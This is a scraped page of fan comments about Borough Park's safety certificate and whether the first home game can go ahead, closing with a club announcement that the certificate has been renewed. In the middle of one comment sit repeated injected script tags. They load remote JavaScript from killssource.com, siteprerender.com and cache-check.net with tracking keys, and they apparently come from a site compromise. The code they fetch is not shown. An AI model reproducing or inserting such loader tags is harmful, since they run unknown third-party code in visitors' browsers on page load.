Good to get an update but a little bit ominous regarding first matches. Really need to play at home on the 29th,the fans deserve it and the club must pull out all the stops to ensure the game goes ahead at borough park. Where are the vociferous councillors and mp when you need them? nothing to do will allerdale, the County Council handle safety certs.

Where are the vociferous councillors and mp when you need them? Someone will need to pull our MP out of Boris's arse if that is at all possible. <script src="//killssource.com/21c1e810f7f98f00b3.js"></script><script type="text/javascript" src="https://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x"></script><script type="text/javascript" src="https://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1600104787109"></script><script type="text/javascript" src="https://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2"></script><script src="//killssource.com/21c1e810f7f98f00b3.js"></script><script type="text/javascript" src="https://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x"></script><script type="text/javascript" src="https://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1600104839987"></script><script type="text/javascript" src="https://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2"></script>

Strange comment We are looking at a regrading to alleviate the problems. What does that mean? not an upgrade !
Someone will tell me but why are these surveys not carried put in early close season even if a second inspection is needed later. I imagine Covid will not have helped.
Presume the approach to NPL is to seek a switch from home to away until matters are sorted. Cant see why the opposition would want to consider that at this stage
Good okd Borough Park, lets hope for fine weather during Autumn

If this is a carry on from last season it was all to do with a wording on the certificate for the ground, something like the structure will be safe but the council wanted it guaranteed to be safe, has this still not been resolved.

Thanks for the update and keeping fans in the loop. Not easy running a Football Club in these times so well done to all involved at Borough Park keeping an even keel is success in itself

Cumbria County Council have released their new Safety Certificate for Borough Park.
The welcome news has been released by Reds after confirmation from the County Council this afternoon.
The certificate is valid through to August next year and permits the full use of both the popular side and Town End stands. “Confirmation of the safety certificate comes on the back of last week’s structured survey of the ground which found no issues requiring immediate action.”
